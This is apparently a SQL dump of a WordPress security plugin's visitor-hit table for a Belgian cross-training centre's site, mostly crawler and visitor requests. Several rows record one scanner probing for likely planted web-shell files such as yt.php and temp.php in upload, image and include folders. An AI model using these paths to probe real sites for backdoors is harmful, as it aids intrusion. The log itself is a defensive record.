(75775, 1497987551.933132, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75776, 1497987860.643493, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-inde.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75777, 1497988099.723162, 3475901815, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75778, 1497988100.491227, 3475901815, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75779, 1497988271.861605, 2637637616, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75780, 1497988728.832455, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/images/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75781, 1497989069.110332, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt2.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75782, 1497989217.899695, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/modules/modules/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75783, 1497989464.638755, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/images/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75784, 1497989725.542382, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-includes/css/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75785, 1497989791.293606, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/uploads/2017/05/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75786, 1497990501.875933, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/yt.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75787, 1497990725.780904, 3362685302, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/temp.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(75788, 1497999225.295554, 675805702, 0, 1, 1, 0, 1, 'http://www.crosstrainingcenter.be/language/en-GB/language/en-GB/en-GB.xml', '', 'Googlebot/2.1 (+http://www.google.com/bot.html)'),
(75789, 1497999480.968003, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75790, 1498015873.812620, 2637637506, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75791, 1498015874.459089, 2637637506, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75792, 1498023471.138553, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75793, 1498023592.071006, 3350653525, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/Newspaper/readme.txt', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6'),
(75794, 1498024222.593514, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75795, 1498028024.804463, 2783005766, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.ecosia.org/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75796, 1498028027.519141, 2783005766, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75797, 1498034740.987117, 3024883607, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75798, 1498035118.697294, 1600959772, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75799, 1498036252.652719, 1374769563, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75800, 1498036253.234998, 1374769563, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75801, 1498036253.818392, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75802, 1498036254.317207, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75803, 1498036254.866570, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75804, 1498036255.382512, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75805, 1498036255.971544, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75806, 1498036256.511237, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75807, 1498036257.056480, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75808, 1498036257.566889, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75809, 1498036258.112613, 1374769563, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.5.4 Darwin/16.6.0'),
(75810, 1498036934.867625, 1137661233, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75811, 1498036935.906034, 1137661233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75812, 1498036936.450109, 1137661233, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)'),
(75813, 1498036999.980983, 2928290816, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133             Safari/537.36'),
(75814, 1498037520.085013, 3512712573, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(75815, 1498039589.828190, 1123631626, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75816, 1498041956.313734, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75817, 1498041957.868841, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75818, 1498041959.429842, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75819, 1498041961.204154, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75820, 1498041962.783920, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75821, 1498041964.370949, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75822, 1498041965.961290, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75823, 1498041967.533606, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75824, 1498041970.475002, 1161474618, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; ips-agent)'),
(75825, 1498059007.983490, 1834596186, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G920F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.83 Mobile Safari/537.36');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(75826, 1498067784.104348, 2025603832, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/themes/error-log.php', 'http://crosstrainingcenter.be/wp-content/themes/error-log.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(75827, 1498068077.818926, 1570674771, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75828, 1498068293.682480, 2637637401, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75829, 1498068854.955430, 2499535434, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'AwarioRssBot/1.0 (+https://awario.com/bots.html; bots@awario.com)'),
(75830, 1498078023.251758, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75831, 1498078023.945067, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75832, 1498078024.439393, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75833, 1498078024.868159, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75834, 1498078025.494874, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75835, 1498078025.942768, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75836, 1498078026.363507, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75837, 1498078027.388541, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75838, 1498078027.810611, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75839, 1498078028.277469, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75840, 1498078028.730380, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75841, 1498078029.378857, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75842, 1498078029.985633, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75843, 1498078030.642644, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75844, 1498093744.139234, 3024883600, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75845, 1498105769.088505, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75846, 1498106943.307414, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(75847, 1498106943.882055, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75848, 1498106944.321341, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75849, 1498106944.822134, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75850, 1498106945.310269, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75851, 1498106945.734092, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75852, 1498106946.148936, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75853, 1498106946.854563, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75854, 1498106947.259829, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75855, 1498106948.064389, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75856, 1498106949.218979, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75857, 1498106949.892718, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75858, 1498106950.332827, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75859, 1498106950.756336, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(75860, 1498108030.595154, 2996488203, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75861, 1498120375.362209, 3281709424, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)'),
(75862, 1498124048.443746, 3024883470, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(75863, 1498125027.773145, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75864, 1498129221.528006, 100556958, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_45_98) AppleWebKit/533.94.57 (KHTML, like Gecko) Chrome/57.5.0523.6895 Safari/530.64 Edge/34.60749'),
(75865, 1498129223.904386, 100556958, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_45_98) AppleWebKit/533.94.57 (KHTML, like Gecko) Chrome/57.5.0523.6895 Safari/530.64 Edge/34.60749'),
(75866, 1498133301.384989, 1837920118, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.0 Mobile/14F89 Safari/602.1'),
(75867, 1498134358.193197, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75868, 1498135617.494934, 1170573314, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75869, 1498136081.746942, 621375751, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75870, 1498146566.638971, 2637637428, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(75871, 1498146905.736501, 2366148185, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75872, 1498146910.187148, 1570674722, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1299398436.png', '', 'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)'),
(75873, 1498147930.487855, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75874, 1498147930.971408, 1123634244, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(75875, 1498148154.205984, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75876, 1498149057.449134, 1464061315, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75877, 1498149059.215774, 1464061315, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75878, 1498149066.962445, 1464061315, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),
(75879, 1498150685.863874, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75880, 1498151398.488798, 2366148131, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(75881, 1498153955.164161, 3657083672, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(75882, 1498156316.034688, 782305590, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', ''),
(75883, 1498157822.737451, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(75884, 1498157823.190824, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75885, 1498157823.652215, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75886, 1498157824.089199, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75887, 1498157824.731647, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75888, 1498157825.328054, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75889, 1498157825.811902, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75890, 1498157826.257395, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(75891, 1498157826.649990, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75892, 1498157827.058075, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75893, 1498157827.553063, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75894, 1498157828.001133, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75895, 1498157828.398553, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(75896, 1498157828.793985, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
